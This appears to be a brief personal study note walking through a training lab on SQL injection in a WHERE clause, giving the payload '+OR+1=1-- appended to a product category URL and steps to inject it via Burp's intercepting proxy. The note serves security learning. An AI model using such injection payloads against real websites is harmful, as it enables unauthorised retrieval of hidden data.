1 Lab SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
- Not all the categories or items are vulnerable
- Click 'Food & Drink' category
- add
'+OR+1=1--to the end of the web address - change to
https://0a79003904b631fe80c7dfb5004400e6.web-security-academy.net/filter?category=Food+%26+Drink'+OR+1=1--
Or use [[Burp]] - Open [[burp]] - open [[burp]] browser - navigate to homepage with all categories - turn on intercept - modify the request that sets the product category filter